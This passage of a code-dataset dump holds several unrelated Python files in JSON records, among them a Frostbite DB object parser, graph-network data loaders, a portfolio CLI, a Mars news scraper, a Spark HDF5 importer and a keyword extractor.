__init__(self,f):\n val=decode7bit(f)\n lower=(val&0x00000000FFFFFFFF)\n upper=(val&0xFFFFFFFF00000000)>>32\n flag=lower&1\n self.timeSpan=((lower>>1)^flag)|(((upper>>1)^flag)<<32)\n\nclass DbObjectType:\n Eoo = 0x0\n Array = 0x1\n Object = 0x2\n HomoArray = 0x3\n Null = 0x4\n ObjectId = 0x5\n Bool = 0x6\n String = 0x7\n Integer = 0x8\n Long = 0x9\n VarInt = 0xA\n Float = 0xB\n Double = 0xC\n Timestamp = 0xD\n RecordId = 0xE\n GUID = 0xF\n SHA1 = 0x10\n Matrix44 = 0x11\n Vector4 = 0x12\n Blob = 0x13\n Attachment = 0x14\n Timespan = 0x15\n StringAtom = 0x16\n TypedBlob = 0x17\n Environment = 0x18\n InternalMin = 0x0\n InternalMax = 0x1F\n Mask = 0x1F\n TaggedField = 0x40\n Anonymous = 0x80\n\n def __init__(self):\n pass\n\nclass DbObject:\n def __init__(self,f,defaultVal=None): #read the data from file\n if not f:\n self.content=defaultVal\n return\n\n header=f.read(1)[0]\n self.typ=header&0x1F\n self.flags=header>>5\n if self.flags&0x04:\n #root entry\n self.name=\"\"\n else:\n self.name=readNullTerminatedString(f)\n\n if self.typ==DbObjectType.Array:\n self.listLength=decode7bit(f) #self\n entries=list()\n endPos=f.tell()+self.listLength\n while f.tell()>1)^(val&1)\n\n elif self.typ==DbObjectType.Float:\n self.content=unpackLE(\"f\",f.read(4))[0]\n\n elif self.typ==DbObjectType.Double:\n self.content=unpackLE(\"d\",f.read(8))[0]\n\n elif self.typ==DbObjectType.Timestamp:\n self.content=DbTimestamp(f)\n\n elif self.typ==DbObjectType.RecordId:\n self.content=DbRecordId(f)\n\n elif self.typ==DbObjectType.GUID:\n self.content=Guid(f,False)\n\n elif self.typ==DbObjectType.SHA1:\n self.content=f.read(20)\n\n elif self.typ==DbObjectType.Vector4:\n self.content=Vector4D(f)\n\n elif self.typ==DbObjectType.Matrix44:\n self.content=Matrix4x4(f)\n\n elif self.typ==DbObjectType.Blob:\n self.content=f.read(decode7bit(f))\n\n elif self.typ==DbObjectType.Attachment:\n self.content=f.read(20) #SHA1\n\n elif self.typ==DbObjectType.Timespan:\n self.content=DbTimespan(f)\n\n else:\n raise Exception(\"Unhandled DB object type 0x%02x at 0x%08x.\" % (self.typ,f.tell()))\n\n def get(self,fieldName,defaultVal=None):\n try: return self.elems[fieldName].content\n except: return defaultVal\n\n def getSubObject(self,fieldName):\n try: return self.elems[fieldName]\n except: return None\n\ndef readToc(tocPath): #take a filename, decrypt the file and make an entry out of it\n return DbObject(unXor(tocPath))\n","sub_path":"frostbite3/dbo.py","file_name":"dbo.py","file_ext":"py","file_size_in_byte":8251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"575281244","text":"import numpy as np\nimport scipy.sparse as sp\nimport torch\nimport sys\nimport pickle as pkl\nimport networkx as nx\n\ndef parse_index_file(filename):\n \"\"\"Parse index file.\"\"\"\n index = []\n for line in open(filename):\n index.append(int(line.strip()))\n return index\n\n\ndef load_data(path=\"citation\", dataset=\"pubmed\"):\n \"\"\"Load citation network dataset.\"\"\"\n print('Loading {} dataset...'.format(dataset))\n\n names = ['x', 'y', 'tx', 'ty', 'allx', 'ally', 'graph']\n objects = []\n for i in range(len(names)):\n with open(\"{}/{}/ind.{}.{}\".format(path, dataset, dataset, names[i]), 'rb') as f:\n if sys.version_info > (3, 0):\n objects.append(pkl.load(f, encoding='latin1'))\n else:\n objects.append(pkl.load(f))\n\n x, y, tx, ty, allx, ally, graph = tuple(objects) # x等csr矩阵,y等numpy.ndarray,graph是collections.defaultdict\n test_idx_reorder = parse_index_file(\"{}/{}/ind.{}.test.index\".format(path, dataset, dataset))\n test_idx_range = np.sort(test_idx_reorder)\n\n if dataset == 'citeseer':\n # Fix citeseer dataset (there are some isolated nodes in the graph)\n # Find isolated nodes, add them as zero-vecs into the right position\n test_idx_range_full = range(min(test_idx_reorder), max(test_idx_reorder)+1)\n tx_extended = sp.lil_matrix((len(test_idx_range_full), x.shape[1])) # FutureWarning: future versions will not create a writeable array from broadcast_array. Set the writable flag explicitly to avoid this warning.\n tx_extended[test_idx_range-min(test_idx_range), :] = tx\n tx = tx_extended\n ty_extended = np.zeros((len(test_idx_range_full), y.shape[1]))\n ty_extended[test_idx_range-min(test_idx_range), :] = ty\n ty = ty_extended\n\n features = sp.vstack((allx, tx)).tolil() # FutureWarning同上\n features[test_idx_reorder, :] = features[test_idx_range, :]\n features = preprocess_features(features) # 得到features是csr\n\n adj = nx.adjacency_matrix(nx.from_dict_of_lists(graph)) # 得到adj是csr\n adj = preprocess_adj(adj)\n\n labels = np.vstack((ally, ty))\n labels[test_idx_reorder, :] = labels[test_idx_range, :]\n\n idx_test = test_idx_range.tolist()\n idx_train = range(len(y))\n idx_val = range(len(y), len(y)+500)\n\n features = torch.FloatTensor(np.array(features.todense()))\n labels = torch.LongTensor(np.where(labels)[1]) # citeseer数据集中孤立点会被忽略\n adj = sparse_mx_to_torch_sparse_tensor(adj)\n \n idx_train = torch.LongTensor(idx_train)\n idx_val = torch.LongTensor(idx_val)\n idx_test = torch.LongTensor(idx_test)\n\n return adj, features, labels, idx_train, idx_val, idx_test\n\ndef preprocess_features(features):\n \"\"\"Row-normalize feature matrix.\"\"\"\n rowsum = np.array(features.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features)\n return features\n\ndef normalize_adj(adj):\n \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\n adj = sp.coo_matrix(adj)\n rowsum = np.array(adj.sum(1))\n d_inv_sqrt = np.power(rowsum, -0.5).flatten()\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt)\n return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo()\n\n\ndef preprocess_adj(adj):\n \"\"\"Preprocessing of adjacency matrix for simple GCN model.\"\"\"\n adj_normalized = normalize_adj(adj + sp.eye(adj.shape[0]))\n return adj_normalized\n\n\ndef accuracy(output, labels):\n preds = output.max(1)[1].type_as(labels)\n correct = preds.eq(labels).double()\n correct = correct.sum()\n return correct / len(labels)\n\n\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\n indices = torch.from_numpy(\n np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\n values = torch.from_numpy(sparse_mx.data)\n shape = torch.Size(sparse_mx.shape)\n return torch.sparse.FloatTensor(indices, values, shape)","sub_path":"codes/gcn/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"499730991","text":"\"\"\"Portfolio parser module\"\"\"\n__docformat__ = \"numpy\"\n\nimport os\nimport argparse\nfrom typing import List, Tuple\nfrom tabulate import tabulate\nimport pandas as pd\nimport yfinance as yf\nfrom gamestonk_terminal.helper_funcs import check_valid_path, parse_known_args_and_warn\n\n# pylint: disable=no-member,unsupported-assignment-operation,unsubscriptable-object\n\n\ndef load_csv_portfolio(other_args: List[str]) -> Tuple[str, pd.DataFrame]:\n \"\"\"Load portfolio from csv\n\n Parameters\n ----------\n other_args: List[str]\n Argparse arguments\n\n Returns\n ----------\n portfolio_name : str\n Portfolio name\n portfolio : pd.DataFrame\n Portfolio dataframe\n \"\"\"\n parser = argparse.ArgumentParser(\n prog=\"load\",\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Function to get portfolio from predefined csv file inside portfolios folder\",\n )\n parser.add_argument(\n \"-p\",\n \"--path\",\n default=\"my_portfolio\",\n type=check_valid_path,\n help=\"Path to csv file\",\n dest=\"path\",\n )\n parser.add_argument(\n \"--no_sector\",\n action=\"store_true\",\n default=False,\n help=\"Add sector to dataframe\",\n dest=\"sector\",\n )\n parser.add_argument(\n \"--no_last_price\",\n action=\"store_true\",\n default=False,\n help=\"Add last price from yfinance\",\n dest=\"last_price\",\n )\n parser.add_argument(\n \"--nan\",\n action=\"store_true\",\n default=False,\n help=\"Show nan entries from csv\",\n dest=\"show_nan\",\n )\n\n try:\n ns_parser = parse_known_args_and_warn(parser, other_args)\n if not ns_parser:\n return \"\", pd.DataFrame()\n\n full_path = os.path.abspath(\n os.path.join(\n \"gamestonk_terminal\",\n \"portfolio\",\n \"portfolio_analysis\",\n \"portfolios\",\n f\"{ns_parser.path}.csv\",\n )\n )\n df = pd.read_csv(full_path)\n\n if not ns_parser.sector:\n df[\"sector\"] = df.apply(\n lambda row: yf.Ticker(row.Ticker).info[\"sector\"]\n if \"sector\" in yf.Ticker(row.Ticker).info.keys()\n else \"yf Other\",\n axis=1,\n )\n\n if not ns_parser.last_price:\n df[\"last_price\"] = df.apply(\n lambda row: yf.Ticker(row.Ticker)\n .history(period=\"1d\")[\"Close\"][-1]\n .round(2),\n axis=1,\n )\n df[\"value\"] = df[\"Shares\"] * df[\"last_price\"]\n\n if not ns_parser.show_nan:\n df = df.dropna(axis=1)\n\n print(tabulate(df, tablefmt=\"fancy_grid\", headers=df.columns))\n print(\"\")\n return ns_parser.path, df\n\n except Exception as e:\n print(e, \"\\n\")\n return \"\", pd.DataFrame()\n\n\ndef breakdown_by_group(portfolio: pd.DataFrame, other_args: List[str]):\n \"\"\"Breakdown of portfolio by a specified group\n\n Parameters\n ----------\n portfolio: pd.DataFrame\n Dataframe of portfolio generated from menu\n other_args: List[str]\n Argparse arguments\n \"\"\"\n parser = argparse.ArgumentParser(\n prog=\"groupby\",\n add_help=False,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=\"Displays portfolio grouped by a given column\",\n )\n parser.add_argument(\n \"-g\",\n \"--group\",\n type=str,\n dest=\"group\",\n default=\"Ticker\",\n help=\"Column to group by\",\n )\n\n # The following arguments will be used in a later PR for customizable 'reports'\n\n # The --func flag will need to be tested that it exists for pandas groupby\n # parser.add_argument(\"-f\",\n # \"--func\",\n # type=str,\n # dest=\"function\",\n # help=\"Aggregate function to apply to groups\"\n # )\n # parser.add_argument(\"-d\",\n # \"--display\",\n # default = None,\n # help = \"Columns to display\",\n # dest=\"cols\")\n\n try:\n ns_parser = parse_known_args_and_warn(parser, other_args)\n if not ns_parser:\n return\n\n group_column = ns_parser.group\n if group_column not in portfolio.columns:\n print(f\"The column {group_column} is not found in your portfolio data\")\n return\n\n grouped_df = pd.DataFrame(portfolio.groupby(group_column).agg(sum)[\"value\"])\n print(\n tabulate(grouped_df, headers=[group_column, \"value\"], tablefmt=\"fancy_grid\")\n )\n print(\"\")\n\n # The following will be used to display certain columns (i.e show Dollars or Percents)\n # valid_columns = []\n # if ns_parser.cols:\n # for col in ns_parser.cols:\n # if col in portfolio.columns:\n # valid_columns.append(col)\n # else:\n # print(f\"{col} not in portfolio columns\")\n # if valid_columns:\n # valid_columns = [\"Shares\"]\n\n except Exception as e:\n print(e, \"\\n\")\n","sub_path":"gamestonk_terminal/portfolio/portfolio_analysis/portfolio_parser.py","file_name":"portfolio_parser.py","file_ext":"py","file_size_in_byte":5267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"378132973","text":"# Dependencies\nfrom bs4 import BeautifulSoup as bs\nimport requests\nfrom splinter import Browser\nimport pandas as pd\nimport time\nimport os\n\n\ndef init_browser():\n \"\"\" Connects path to chromedriver \"\"\"\n \n executable_path = {'executable_path': 'chromedriver.exe'}\n return Browser('chrome', **executable_path, headless=False)\nmarsdata = {}\n\ndef scrape_News():\n \n # URL of page to be scraped\n news_url = 'https://mars.nasa.gov/news/'\n browser = init_browser()\n browser.visit(news_url)\n time.sleep(3)\n news_response = requests.get(news_url)\n\n # Create BeautifulSoup object; \n news_soup = bs(news_response.text, 'lxml')\n try:\n # pull latest news title and paragrapgh\n results = news_soup.find('div', class_='features')\n title = results.find('div', class_='content_title').text\n paragraph = results.find('div', class_='rollover_description').text\n\n \n #store results into a dictionary marsdata\n marsdata[\"Latest_news_titles\"] = title\n marsdata[\"Latest_news_summary\"] = paragraph\n\n except AttributeError as e:\n return(e)\n \n finally:\n browser.quit()\n\n # task 2\ndef scrape_Weather():\n\n twitter_url = 'https://twitter.com/marswxreport?lang=en'\n twitter_response = requests.get(twitter_url)\n twitter_soup = bs(twitter_response.text, 'lxml')\n try:\n twitter_result = twitter_soup.find('div', class_='js-tweet-text-container')\n mars_weather=twitter_result.text.strip()\n \n \n #store results into a dictionary marsdata\n marsdata[\"marsweather\"] = mars_weather\n\n except AttributeError as e:\n print(e)\n \n \n\n # # task 3\ndef scrape_Image():\n # Call on chromedriver function to use for splinter\n browser = init_browser()\n\n image_url = 'https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n \n browser.visit(image_url)\n\n time.sleep(1)\n try:\n browser.click_link_by_partial_text('FULL IMAGE')\n image_html = browser.html\n\n image_soup = bs(image_html, \"html.parser\")\n \n featured_image = image_soup.select_one(\".carousel_item\").get(\"style\")\n featured_image = featured_image.split(\"\\'\")[1]\n featured_image_url = f'https://www.jpl.nasa.gov{featured_image}'\n \n # Store url to dictionary\n marsdata[\"featured_image_url\"] = featured_image_url\n except AttributeError as e:\n print(e)\n finally:\n browser.quit()\n\n # task 4\ndef scrape_Facts():\n browser = init_browser()\n facts_url = 'https://space-facts.com/mars/'\n browser.visit(facts_url)\n time.sleep(1)\n try:\n facts = pd.read_html(facts_url)\n mars_df = facts[0]\n mars_df.columns = ['Description', 'Value']\n mars_df.set_index('Description', inplace=True)\n\n mars_facts = mars_df.to_html()\n mars_facts.replace(\"\\n\",\"\")\n mars_df.to_html('mars_facts.html')\n \n marsdata['mars_facts'] = mars_facts\n\n print('Mars Facts:'+ mars_facts)\n \n except AttributeError as e:\n print(e)\n\n finally:\n browser.quit()\n \n #task 5\ndef scrape_Hemispheres():\n # Call on chromedriver function to use for splinter\n browser = init_browser()\n hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n browser.visit(hemisphere_url)\n time.sleep(2)\n hemisphere_html = browser.html\n hemisphere_soup = bs(hemisphere_html, 'lxml')\n base_url =\"https://astrogeology.usgs.gov\"\n try:\n image_list = hemisphere_soup.find_all('div', class_='item')\n\n # Create list to store dictionaries of data\n hemisphere_image_urls = []\n\n # Loop through list of hemispheres and click on each one to find large resolution image\n for image in image_list:\n\n # Create a dicitonary to store urls and titles\n hemisphere_dict = {}\n \n # Find link to large image\n href = image.find('a', class_='itemLink product-item')\n link = base_url + href['href']\n\n # Visit the link\n browser.visit(link)\n\n # Wait 1 second \n time.sleep(2)\n \n # Parse the html of the new page\n hemisphere_html2 = browser.html\n hemisphere_soup2 = bs(hemisphere_html2, 'lxml')\n\n # Find the title\n img_title = hemisphere_soup2.find('div', class_='content').find('h2', class_='title').text\n \n # Append to dict\n hemisphere_dict['title'] = img_title\n \n # Find image url\n img_url = hemisphere_soup2.find('div', class_='downloads').find('a')['href']\n \n # Append to dict\n hemisphere_dict['url_img'] = img_url\n \n # Append dict to list\n hemisphere_image_urls.append(hemisphere_dict)\n \n # Store hemisphere image urls to dictionary\n marsdata['hemisphere_image_urls'] = hemisphere_image_urls\n except AttributeError as e:\n print(e)\n\ndef scrape(): \n \n scrape_News()\n scrape_Weather()\n scrape_Image()\n scrape_Facts()\n scrape_Hemispheres() \n return marsdata\n ","sub_path":"Missions_to_Mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"570986321","text":"import features\nfrom pyspark.sql import Row\n\nimport h5py\nimport numpy as np\nfrom itertools import product\nfrom collections import namedtuple\nfrom pyspark.sql.types import *\nfrom tomni.backend import data_path\n\nimport os\n\nImportTask = namedtuple('ImportTask', ['chunk', 'start', 'end' , 'overlap' , 'files']) \nSubVolume = namedtuple('SubVolume', ['chunk', 'channel', 'machine_labels','human_labels','affinities', 'start', 'end' , 'overlap']) \n\nclass Dataset(object):\n\n def __init__(self, sc, sqlContext):\n \"\"\"\n SparkContext is required to return rdds\n \"\"\"\n self.sc = sc\n self.sqlContext = sqlContext\n self.subvolumes = None\n self.vertices = None\n self.edges = None\n self.chunks =None\n\n if not os.path.isdir(self.files('vertices')) or not os.path.isdir(self.files('edges')):\n self._get_subvolumes()\n self.compute_voxel_features()\n self.vertices.write.parquet(self.files('vertices'))\n self.edges.write.parquet(self.files('edges'))\n else:\n # Load the vertices and edges back.\n self.vertices = self.sqlContext.read.parquet(self.files('vertices'))\n self.edges = self.sqlContext.read.parquet(self.files('edges'))\n\n\n if not os.path.exists(self.files(\"chunks\")+\"/0-0-0.json\"):\n if not os.path.exists(self.files(\"chunks\")):\n os.makedirs(self.files(\"chunks\"))\n self._get_subvolumes() \n pfs = features.PrepareForServe()\n self.subvolumes.map(pfs.map).collect()\n \n\n def get_shape(self):\n\n f = h5py.File(self.files('machine_labels'),'r')\n if 'main' not in f: \n raise ImportError(\"Main dataset doesn't exists\")\n shape = np.array(f['main'].shape)\n f.close()\n return shape\n\n def import_hdf5(self, chunk_size=64, overlap=1 ):\n \"\"\"\n This code is executed in the master node.\n It opens the hdf5 files:\n * channel images\n * machine labels ( the output from watershed )\n * human labels ( and optional segmentation created by humans)\n * affinities ( the output from the conv nets where watershed was ran )\n to verify they all have the right dataset with the right shape (TODO)\n It divides the dataset into chunks, which all then import in parallel by the workers.\n \"\"\"\n\n import_tasks = []\n shape = self.get_shape()\n\n n_chunks = np.ceil( shape / float(chunk_size)).astype(int)\n n_chunks = np.maximum( n_chunks , np.array([1,1,1]))\n # n_chunks = np.minimum( n_chunks, np.array([1,4,4]))\n\n for chunk in product(*list(map(range,n_chunks))):\n\n start = np.maximum(np.array(chunk) * chunk_size, np.array([0,0,0]))\n end = np.minimum((np.array(chunk) + 1) * chunk_size + overlap, shape)\n chunk_overlap = (end != shape) * overlap\n\n files = { 'channel': self.files('channel'),\n 'machine_labels': self.files('machine_labels'),\n 'human_labels': self.files('human_labels'),\n 'affinities': self.files('affinities')}\n it = ImportTask( chunk , start, end , chunk_overlap , files)\n import_tasks.append(it)\n \n return import_tasks\n\n @staticmethod\n def _get_subvolume( it ):\n \"\"\"\n This code is executed by the worker, it runs an ImportTask which was created by\n import_hdf5.\n\n This method has to be static, because the class has a copy of the sparkContext\n which cannot be referenced by any worker.\n \"\"\"\n\n data = {}\n for h5file in ['channel','machine_labels', 'human_labels' , 'affinities']:\n f = h5py.File(it.files[h5file],'r')\n if 'main' not in f:\n raise ImportError(\"Main dataset doesn't exists\")\n\n if h5file == 'affinities':\n chunk_data = f['main'][:,\n it.start[0]:it.end[0],\n it.start[1]:it.end[1],\n it.start[2]:it.end[2]]\n else:\n chunk_data = f['main'][it.start[0]:it.end[0],\n it.start[1]:it.end[1],\n it.start[2]:it.end[2]]\n\n data[h5file] = chunk_data\n\n sv = SubVolume(it.chunk,\n data['channel'],\n data['machine_labels'],\n data['human_labels'],\n data['affinities'],\n it.start,\n it.end,\n it.overlap)\n return sv\n\n def _get_subvolumes(self):\n\n if self.subvolumes != None:\n return self.subvolumes\n \n volumes = self.import_hdf5()\n volumes = self.sc.parallelize(volumes)\n self.subvolumes = volumes.map(self._get_subvolume)\n \n def compute_voxel_features(self):\n \n def to_row( data ):\n return map(int,data)\n\n cr = features.ContactRegion()\n adjcency = self.subvolumes.flatMap(cr.map).reduceByKey(cr.reduce)\n edges = []\n for edge, voxels in adjcency.toLocalIterator():\n affinities_sum = float( np.sum([pair[1] for pair in voxels]) )\n contact_region_size = len(voxels)\n\n #The src should always be an smaller id that the dst\n if edge[0] > edge[1]:\n edge[0] , edge[1] = edge[1] , edge[0]\n \n edges.append( edge + (affinities_sum, contact_region_size) )\n\n \n self.edges = self.sqlContext.createDataFrame(edges, ['src','dst','affinities_sum','contact_region_size'])\n ss = features.SegmentSize()\n sizes = self.subvolumes.flatMap(ss.map).reduceByKey(ss.reduce).map(to_row).toDF(['id','size'])\n self.vertices = sizes\n\n\n # m = features.Mesh()\n # meshes = self.subvolumes.flatMap(m.map).reduceByKey(m.reduce).map(to_row).toDF(['id','meshes'])\n # vertices = sizes.join(meshes, 'id')\n # self.vertices = vertices\n\n # vertices.saveAsTable( tableName='vertices', mode='overwrite', path=self.files('vertices') )\n #nx.write_gpickle(self.g.g , self.files('graph'))\n return\n\n @staticmethod\n def files(file):\n production = False\n\n if production:\n \n files = {\n 'machine_labels': 's3://agglomeration/snemi3d_ds_test/machine_labels.h5',\n 'human_labels': 's3://agglomeration/snemi3d_ds_test/human_labels.h5',\n 'affinities': 's3://agglomeration/snemi3d_ds_test/affinities.h5',\n 'adjcency':'s3://agglomeration/snemi3d_ds_test/adjcency',\n 'sizes': 's3://agglomeration/snemi3d_ds_test/sizes',\n 'meshes':'s3://agglomeration/snemi3d_ds_test/meshes',\n 'vertices': 's3://agglomeration/snemi3d_ds_test/vertices',\n 'graph': 's3://agglomeration/snemi3d_ds_test/graph'\n }\n\n else:\n\n files = {\n 'channel': data_path+'/small_ch_dr5.h5',\n 'machine_labels': data_path+'/small_ml_dr5.h5',\n 'human_labels': data_path+'/small_ml_dr5.h5',\n 'affinities': data_path+'/small_aff_dr5.h5',\n 'chunks': data_path+'/chunks',\n 'vertices': data_path+'/vertices',\n 'edges': data_path+'/edges'\n }\n \n return files[file]","sub_path":"tomni/backend/graph/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":6832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"53291612","text":"# -*- coding: utf-8 -*-\n__author__ = 'duyongan'\n__date__ = '2018/6/28 10:01'\nimport jieba\njieba.initialize()\nimport re\nimport jieba.posseg as pseg\nimport networkx as nx\nfrom pylab import *\nmpl.rcParams['font.sans-serif'] = ['SimHei']\nimport numpy as np\nimport collections\nimport nltk\n\nclass analyse:\n def __init__(self,text,lang,stopwords,idf_map,my_dict):\n self.stopwords=stopwords\n self.idf_map=idf_map\n self.dict=my_dict\n # self.text = text\n self.lang = lang\n text=''.join([t for t in text.split('\\n') if len(t)>4])\n text = text.replace('\\n', '').replace('\\u3000', '').replace('?”', '”').replace('!”', '”').replace('。”', '”')\n if lang=='zh':\n text=re.sub('(.*?)', '', text)\n sentences = re.split(r\"([。!?……])\", text)\n sentences.append('')\n self.sentences = [\"\".join(i) for i in zip(sentences[0::2], sentences[1::2])]\n # 分词\n sentences2=[]\n for sentence in self.sentences:\n words =[tuple_ for tuple_ in list(pseg.cut(sentence))if list(tuple_)[0].strip()]\n words2=[]\n temp=''\n enstart=False\n for i in range(len(words)):\n if words[i].flag in ['n','nd','nh','ni','nl','ns','nt','nz','vn','nr','nrf','nsf','ng','nrj','nr1','nr2'] and len(temp)<=4 and not enstart:\n if words[i].word not in self.stopwords:\n temp=temp+words[i].word\n if i==len(words)-1:\n if temp.strip()!='':\n words2.append(temp)\n else:\n if temp.strip()!='' and not enstart:\n words2.append(temp)\n temp=''\n if words[i].flag=='eng':\n en_word=nltk.pos_tag([words[i].word])[0][1]\n if en_word in ['NN','NNS','NNP','NNPS'] and words[i].word not in self.stopwords:\n if enstart:\n if len(temp.strip().split()) > 2 or temp.strip().isupper() and temp.strip() not in self.stopwords:\n words2.append(temp.strip())\n temp=''\n if temp:\n temp+=' '+words[i].word.strip()\n else:\n temp = words[i].word.strip()\n else:\n temp=words[i].word.strip()\n enstart=True\n try:\n if words[i+1].flag!='eng':\n if len(temp.strip().split())>2 or temp.strip().isupper() and temp.strip() not in self.stopwords:\n words2.append(temp.strip())\n enstart=False\n temp=''\n except:\n words2.append(temp.strip())\n enstart = False\n temp=''\n\n if i+1 2 or temp.strip().isupper() and temp.strip() not in self.stopwords :\n words2.append(temp.strip())\n enstart = False\n temp = ''\n else:\n if temp:\n if len(temp.strip().split()) > 2 or temp.strip().isupper() and temp.strip() not in self.stopwords:\n words2.append(temp.strip())\n enstart = False\n temp = ''\n sentences2.append(words2)\n elif lang=='en':\n text = re.sub('\\(.*?\\)', '', text)\n sentences = re.split(r\"([.?!…])\", text)\n sentences.append('')\n self.sentences = [\"\".join(i) for i in zip(sentences[0::2], sentences[1::2])]\n sentences2=[]\n for sentence in self.sentences:\n words =list(nltk.pos_tag(sentence.split()))\n words2=[]\n temp=''\n for i in range(len(words)):\n if words[i][1] in ['NN','NNS','NNP','NNPS'] and len(temp.split())<=4 and words[i][0] not in self.stopwords:\n if temp:\n temp=temp.strip()+' '+words[i][0].strip()\n else:\n temp=words[i][0].strip()\n if i==len(words)-1:\n if len(temp.strip().split()) > 2 or temp.strip().isupper() and temp not in self.stopwords :\n words2.append(temp)\n else:\n if len(temp.strip().split()) > 2 or temp.strip().isupper() and temp not in self.stopwords :\n words2.append(temp)\n temp=''\n sentences2.append(words2)\n else:\n return []\n #去停用词和单字\n self.sentences3=[]\n for sentence in sentences2:\n sentence2=[]\n for word in sentence:\n if word in self.stopwords:\n pass\n elif len(word)<=2:\n pass\n else:\n sentence2.append(word)\n if len(sentence2)>1:\n self.sentences3.append(sentence2)\n\n #单字词频统计\n def flatten(x):\n result = []\n for el in x:\n if isinstance(x, collections.Iterable) and not isinstance(el, str):\n result.extend(flatten(el))\n else:\n result.append(el)\n return result\n word_map={}\n word_list=flatten(self.sentences3)\n for word in list(set(word_list)):\n word_map[word]=word_list.count(word)\n #词对频数统计\n word2word_map={}\n word2word=[]\n for sentence in self.sentences3:\n for i in range(len(sentence)):\n for j in range(i+1,len(sentence)):\n alist=[]\n alist.append(sentence[i])\n alist.append(sentence[j])\n alist=sorted(alist)\n word2word.append('_'.join(alist))\n for w2w in list(set(word2word)):\n word2word_map[w2w]=word2word.count(w2w)\n\n #计算共现网络权重\n word2word_weight={}\n for w2w in list(set(word2word)):\n word2word_weight[w2w]=(word2word_map[w2w]/word_map[w2w.split('_')[0]]+word2word_map[w2w]/word_map[w2w.split('_')[1]])*0.5\n\n #共现网络可视化\n G=nx.Graph()\n word_list2=[]\n for word in list(set(word_list)):\n word=unicode(word.encode(\"utf-8\"),'utf-8')\n word_list2.append(word)\n G.add_nodes_from(word_list2)\n for w2w in word2word_weight.keys():\n G.add_edge(unicode(w2w.split('_')[0].encode(\"utf-8\"),'utf-8'),unicode(w2w.split('_')[1].encode(\"utf-8\"),'utf-8'),weight=word2word_weight[w2w])\n word_map2=[]\n for word in G.nodes:\n word_map2.append((word,word_map[word]))\n fre=[]\n idf_num=[]\n max_idf_num=max(self.idf_map.values())\n for flu in word_map2:\n fre.append(flu[1])\n try:\n idf_num.append(self.idf_map[flu[0]])\n except:\n idf_num.append(max_idf_num)\n fre=np.array(fre)\n idf_num=np.array(idf_num)\n try:\n pr1=np.array(list(nx.degree_centrality(G).values()))\n except:\n pr1=np.zeros(len(word_list2))\n try:\n pr2=np.array(list(nx.eigenvector_centrality(G).values()))\n except:\n pr2=np.zeros(len(word_list2))\n try:\n pr3=np.array(list(nx.betweenness_centrality(G).values()))\n except:\n pr3=np.zeros(len(word_list2))\n pr4=fre\n weight_=list((0.1*pr1/max(0.001,sum(pr1))+0.1*pr2/max(0.001,sum(pr2))+0.5*pr3/max(0.001,sum(pr3))+0.3*pr4*idf_num/max(0.001,sum(pr4))))\n for i,word in enumerate(G.nodes):\n if word.isupper():\n weight_[i] = weight_[i] * 0.25\n if word in self.dict:\n weight_[i] = weight_[i] * 10\n self.keywords=dict(zip(G.nodes,weight_))\n\n def getKeywords(self,num_of_keywords):\n keywords = sorted(self.keywords.items(), key=lambda k: k[1],reverse=True)\n keywords=keywords[:min(num_of_keywords,len(keywords)-1)]\n keywords=[term[0] for term in keywords]\n return keywords\n\n\n def getAbstract(self,num_of_abstract):\n sentences_score = {}\n for i,sentence in enumerate(self.sentences3):\n sentence_score = 0\n if len(sentence) > 0:\n for word in sentence:\n sentence_score += self.keywords[word]\n sentences_score[i] = sentence_score / len(sentence)\n if i==0 or i==len(self.sentences3)-1:\n sentences_score[i] =sentences_score[i] *10\n if len(self.sentences[i])>50:\n sentences_score[i] = 0.01*sentences_score[i]\n else:\n sentences_score[i] =0\n sentences_score = sorted(sentences_score.items(), reverse=True, key=lambda k: k[1])\n results = []\n for sentence_num in sorted(sentences_score[:num_of_abstract]):\n sentence = ''\n seq = re.split('([,;])', self.sentences[sentence_num[0]])\n seq.append('')\n seq = [\"\".join(i) for i in zip(seq[0::2], seq[1::2])]\n for sen in seq:\n words = list(jieba.cut(sen))\n words2 = []\n for word in words:\n if word in self.stopwords:\n pass\n elif len(word) <= 1:\n pass\n else:\n words2.append(word)\n if len(sen) <= 4:\n __if_useful = False\n word_flags = pseg.lcut(sen)\n for word_flag in word_flags:\n if word_flag.flag in ['n', 'nd', 'nh', 'ni', 'nl', 'ns', 'nt', 'nz', 'vn', 'nr', 'nrf', 'nsf',\n 'ng', 'nrj', 'nr1', 'nr2']:\n __if_useful = True\n break\n if __if_useful:\n if sentence != '':\n sentence = sentence + sen\n elif len(words2) == 0:\n pass\n else:\n if sentence != '':\n sentence = sentence + sen\n else:\n sentence = sentence + sen\n results.append(sentence)\n return ''.join(results)","sub_path":"analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":11446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"401975363","text":"import asyncio\nimport websockets\nimport json\n\nclass WebSoketRunner:\n def 